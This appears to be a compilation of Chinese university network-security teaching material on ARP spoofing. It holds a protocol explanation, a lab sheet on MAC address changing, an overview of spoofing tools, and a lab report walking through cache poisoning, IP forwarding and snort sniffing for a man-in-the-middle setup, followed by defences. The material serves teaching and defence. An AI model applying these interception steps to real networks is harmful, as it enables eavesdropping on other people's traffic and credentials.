根据ARP 协议,如果一台计算机接收到了一个ARP请求报文,在满足下列两个条件的情况下,该计算机会用ARP请求报文中的源IP地址和源物理地址更新自己的ARP缓存:(1)如果发起该ARP请求的IP地址在自己本地的ARP缓存中;(2)请求的目标IP地址不是自己的。
可以举一个例子说明这个过程,假设有三台计算机A,B,C,其中B已经正确建立了A和C计算机的ARP表项。
假设A是攻击者,此时,A发出一个ARP请求报文,该ARP 请求报文这样构造:(1)源IP地址是C的IP地址,源物理地址是A的MAC地址;(2)请求的目标IP地址是B的IP地址。
计算机网络安全arp试验
试验四arp欺骗试验目的:加深大家对arp协议的理解,进一步理解网络数据包在网络传输过程,通过arp 欺骗的试验,深刻理解网络欺骗行为实施及危害。
试验内容:1,运用wireshark进行网络数据包的抓取。
查看数据包源ip地址与物理地址(可以重点关注本机),目的ip地址与物理地址。
2,查看本机物理地址与ip地址法1:运行------ ipconfig /all法2:控制面板------》网络连接------》属性--------------》详细信息(xp与win7有区别)3,获取局域网内其他主机物理地址Cmd--------》ping 主机-----------》arp –a就可以显示出来,4,修改本机物理地址理论上物理地址是固化在网上上的,是不能修改的,但是系统并不是每次都是从网卡中读取,当第一次读取mac地址后,就保存在了系统里,系统使用时直接从系统中读取,故而我们可以对系统进行修改来伪装系统的mac地址。
5,修改本机mac地址网络连接---------》属性------------》配置---------------》高级-------------》选择物理地址写入期望值6,查看本机网络信息方法同第2步,(如没有变化,请重启网络)物理地址以改变。
7,利用wireshark重新抓取数据包,产看对应主机对应的ip地址与物理地址是否已经改变,注意物理地址已经变成了刚才配置的物理地址8,利用另一台主机测试被修改的主机的mac地址是不是已经改变,方法同第3步。
思考题:有的网络运行商要求用户必须在制定主机上使用指定的账户才能接入网络,实际上是限制了登录主机的物理地址,你有没有办法绕过这个限制?思考ARP病毒的原理,如何防止ARP病毒的危害?请完成试验报告!。
实验三ARP欺骗工具及原理分析
实验三ARP欺骗工具及原理分析ARP欺骗(Address Resolution Protocol Spoofing)又被称为ARP 攻击,是一种网络安全攻击手段。
ARP是一种用于将IP地址解析为物理MAC地址的协议,用于在局域网中确定数据包的目的地。
ARP欺骗就是欺骗目标主机将数据包发送给攻击者,从而实现中间人攻击或者网络监听。
ARP欺骗工具是一种利用ARP协议漏洞实施攻击的工具,可在局域网环境中进行ARP欺骗攻击。
其工作原理为攻击者伪装成局域网中的其他主机或者网关,在目标主机和网关之间进行中间人攻击,截取目标主机和网关之间的通信数据并进行监听或篡改。
常见的ARP欺骗工具有Ettercap、Cain和Abel、Dsniff等。
这些工具通常具有以下功能:1.欺骗目标主机:工具伪装成目标主机或者网关,向局域网中的其他主机发送ARP欺骗包,将通信数据导向攻击者,实现中间人攻击。
2.监听和分析网络数据:工具可以截获目标主机和网关之间的通信数据,并对数据进行监听和分析。
攻击者可以获取受害者的账号、密码、通信内容等敏感信息。
3.数据篡改和注入:攻击者可以修改截获的数据包内容,实现对通信数据的篡改或者注入恶意代码。
ARP欺骗工具的原理分析如下:1.目标主机和网关之间的ARP协议交换:当目标主机(例如A)需要和网关(例如B)进行通信时,需要将目标主机的IP地址解析为物理MAC地址。
目标主机会发送一个ARP请求,广播到局域网中的所有主机,询问拥有指定IP地址的主机的MAC地址。
网关收到这个请求后会回复一个ARP应答,将自己的MAC地址发送给目标主机。
2.攻击者的ARP欺骗:ARP欺骗工具会在局域网中伪造ARP应答包,将攻击者的MAC地址伪装成网关的MAC地址。
这样当目标主机发送数据包时,就会将数据包发送给攻击者的MAC地址,而不是真正的网关。
攻击者可以选择将这个数据包转发给真正的网关,保持网络通信的正常;同时也可以截获这个数据包,进行监听,篡改或者注入恶意代码。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
《计算机网络安全》实验报告实验名称: arp欺骗提交报告时间:年月日一、实验目的程序实现ARP欺骗,对ARP欺骗进行进一步的认识并提出防范措施。
二、系统环境主机1 windows系统主机2 windows系统主机3 linux操作系统三、网络环境同一网段下的网络四、实验步骤与实验结果将主机A、C、E为一组,B、D、F为一组。
实验角色说明如下:实验主机实验角色主机A、B 目标主机一/Windows主机C、D 黑客主机/Linux主机E、F 目标主机二/Windows首先使用“快照X”恢复Windows/Linux系统环境。
一.ARP欺骗攻击实验需求:(1)本实验使用交换网络结构(参见附录B),组一、二和三间通过交换模块连接(主机A、C、E通过交换模块连接,主机B、D、F也通过交换模块连接)。
因此,正常情况下,主机C无法以嗅探方式监听到主机A与主机E间通信数据,同样主机D也无法监听到主机B与主机F 间的通信数据。
(2)主机C要监听主机A和主机E间的通信数据;主机D要监听主机B与主机F间的通信数据。
分析:黑客主机通过对目标主机进行ARP欺骗攻击,获取目标主机间的通信数据。
1.正常通信图6-1-1 目标主机正常通信示意图(1)目标主机二单击工具栏“UDP工具”按钮,启动UDP连接工具,创建2513/udp服务端。
主机1发送数据(2)目标主机一启动UDP连接工具,将“目标机器”IP地址指定为目标主机二的地址,目标端口与服务器一致。
在“数据”文本框中输入任意内容,单击“发送”按钮,向服务端发数据。
服务端确定接收到数据。
主机2接收到数据(3)黑客主机单击工具栏“控制台”按钮,切换至/opt/ExpNIC/NetAD-Lab/Tools/ids 目录(Snort目录),命令如下:主机3通过上述命令snort仅会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据(详细的snort使用命令见实验10|练习一)。
(4)目标主机一再次向目标主机二发送消息,黑客主机停止snort监听(Ctrl+C),观察snort监听结果,是否监听到目标主机间的通信数据。
为什么?主机1向主机2发送消息主机3不能监听到主机1发送到的数据因为命令snort只会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据,并不能截获数据(5)目标主机一查看ARP缓存表,确定与目标主机二的IP相映射的MAC地址是否正常。
此时主机1arp缓存正常2.ARP攻击图6-1-2 ARP攻击示意图(1)黑客主机单击平台工具栏“控制台”按钮,进入实验目录,运行ARPattack程序攻击目标主机一,将其ARP缓存表中与目标主机二相映射的MAC地址更改为黑客主机的MAC地址,命令如下:其中第一个参数为被攻击主机IP地址,第二个参数为被攻击主机MAC地址,第三个参数为与被攻击主机进行正常通信的主机IP地址。
通过上述命令在目标主机一的ARP缓存表中,与目标主机二IP相绑定的MAC被更改为黑客主机MAC。
(2)黑客主机启动snort,同样监听源IP地址为目标主机一的、传输协议类型为UD P的网络数据。
(3)目标主机一继续向目标主机二发送数据,目标主机二是否接收到数据?目标主机间的通信是否正常?黑客主机停止snort监听,观察snort监听结果,是否监听到目标主机间的通信数据。
为什么?主机2不能接收到数据,通信不正常主机1发送数据“ee”主机三监听到发送的数据“ee”因为运行ARPattack程序攻击目标主机一,将其ARP缓存表中与目标主机二相映射的MAC 地址更改为黑客主机的MAC地址,主机3已经截获了主机1发给主机2的数据;命令snort会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据。
(4)目标主机一查看ARP缓存表,确定与目标主机二的IP相映射的MAC地址是否正常。
Ip为主机2ip,但MAC已经改成黑客主机的MAC地址了3.单向欺骗正如步骤2中所示的实验现象,在黑客实施了简单的ARP攻击后,目标主机二会接收不到目标主机一的消息,在接下来的时间里目标主机一、二很容易会对网络状况产生怀疑。
他们会去查看并修改ARP缓存表。
所以应尽量减少目标主机由于受到ARP攻击而表现出的异常,将黑客主机做为“中间人”,将目标主机一发送的数据转发给目标主机二,是一种很可行的方法。
图6-1-3 ARP单向欺骗示意图(1)黑客主机开启路由功能,具体操作如下:在控制台中输入命令:echo 1 >/proc/sys/net/ipv4/ip_forward主机3(2)黑客主机捕获来自目标主机一的数据包,并将其转发给目标主机二,具体操作如下(添加iptables防火墙转发规则):主机3上述第一条规则允许将来自网络接口eth0、源IP为目标主机一IP、目的IP为目标主机二IP的数据包进行转发,目的网络接口为eth0;第二条规则允许接收针对第一条规则的应答数据包(iptables具体使用方法见实验9|练习二)。
(3)黑客主机启动snort,监听源地址为目标主机一IP、协议类型为UDP的数据包。
主机1发送数据“zailai”(4)目标主机一再次向目标主机二发送UDP数据,目标主机二是否接收到数据?为什么?主机2能接收到数据因为黑客主机通过iptables规则允许将来自网络接口eth0、源IP为目标主机一IP、目的IP为目标主机二IP的数据包进行转发,实现了将黑客主机做为“中间人”,将目标主机一发送的数据转发给目标主机二(5)黑客主机停止snort监听,会观察到类似如图6-1-4所示信息。
图6-1-4 数据包转发从上图所示信息中可以知道,由源主机(MAC地址是0:C:29:21:1A:7)发往目的主机(M AC地址是0:C:29:B7:3C:1)的数据包在网络传输时的路由过程是:源主机->中间人(MAC地址是0:C:29:F6:44:FB)->目标主机。
(6)黑客主机查看ARP缓存表,确定与目标主机一的IP相映射的MAC地址;确定与目标主机二的IP相映射的MAC地址。
(7)目标主机二查看ARP缓存表,确定与目标主机一的IP相映射的MAC地址。
下面来测试目标主机二对一的数据通信情况。
(8)黑客主机启动snort,仅监听协议类型为ICMP的网络数据包。
(9)目标主机一对目标主机二进行ping操作,是否能够ping通?请描述数据包的在网络中的传输路径。
主机1对主机2进行 Ping操作,可以ping通,黑客可以监测到数据由源主机(MAC地址是0:C:29:21:1A:7)发往目的主机(MAC地址是0:C:29:B7:3C:1)的数据包在网络传输时的路由过程是:源主机->中间人(MAC地址是0:C:29:F6:44:FB)->目标主机。
(10)黑客主机停止snort监听,观察结果,是否监听到主机一给主机二发出的ICMP 回显请求数据包?是否监听到主机二给主机一发出的ICMP回显应答数据包?为什么会出现此种现象?能监听到主机一给主机二发出的ICMP回显请求数据包,不能监听到主机二给主机一发出的ICMP回显应答数据包。
目标主机二的ARP缓冲表中与目标主机一IP相映射的MAC地址仍然是目标主机一的MAC地址。
所以目标主机二会将ICMP回显应答数据包直接发送给目标主机一4.完全欺骗黑客如何才能够做到监听目标主机一、二间的全部通信数据呢?图6-1-5 ARP完全欺骗示意图(1)目标主机一访问目标主机二的Web服务。
(2)黑客对目标主机二实施ARP攻击。
(3)黑客主机启动snort,监听目标主机一、二间的通信数据。
命令如下:(4)目标主机一再次访问目标主机二的Web服务。
(5)黑客主机观察snort监听结果。
此时主机2 ping主机1查看主机2的缓存表,发现主机1的ip对应的MAC已经变成主机3(黑客)的了黑客主机3能够做到监听目标主机1、2间的全部通信数据二.防范ARP欺骗当发现主机通信异常或通过网关不能够正常上网时,很可能是网关的IP被伪造。
可以使用下列手工方法防范ARP欺骗攻击。
1.清空ARP缓存表清空ARP缓存表的命令是arp -d ,之后对目标主机进行ping操作。
2.IP/MAC地址绑定实现IP/MAC地址绑定,实际上就是向ARP缓存表中添加静态(static)项目,这些项目不会被动态刷新,在机器运行过程中不会失效。
(1)Linux下绑定IP/MAC实验使用的Linux系统环境(FC5)中,arp命令提供了-f选项,完成的功能是将/etc/ ethers文件中的IP/MAC地址对以静态方式添加到ARP缓存表中。
建立静态IP/MAC捆绑的方法如下:首先建立/etc/ethers文件(或其它任意可编辑文件),编辑ethers文件,写入正确的IP/MAC地址对应关系,格式如下:新建ethers文件,并添加IP/MAC地址然后让系统在启动后自动加载项目,具体操作:在/etc/rc.d/rc.local最后添加新行arp -f,重启系统即可生效。
此时输入arp -e查看arp缓存表,静态项目的Flags Mask内容为CM,其中M表示当前项目永久有效。
(2)Windows下绑定IP/MACWindows平台中虽然arp命令没有提供-f选项,但同样可以实现IP/MAC地址静态绑定,方法是首先清除ARP缓存表,然后将IP MAC地址对添加到缓存表中,最后实现开机后自动执行上述功能。
请根据上述提示,结合arp命令,写出实现172.16.0.152 00-0c-29-95-b5-e9地址对静态绑定的操作步骤,并添写下面的脚本文件。
经过如此操作后,进行ARP绑定后,在缓存表中进行主机IP地址和物理地址绑定。
不会再受黑客篡改IP地址和物理地址。
主机正确识别主机IP,达到安全识别并主机之间通信的目的。
3.ARP监听由于ARP欺骗是通过伪装其它IP地址向目标主机发送ARP应答报文实现的,所以通过A RP监听可以监视网络中的目标为本机的ARP应答数据包的流向。
设置监听程序对目标地址为本机地址或子网广播地址或受限广播地址的ARP数据包进行监听。
以本机IP地址为172.16.0.152,子网掩码为255.255.255.0为例,使用snort监听满足上述条件的数据包,命令如下:监听到的数据包:。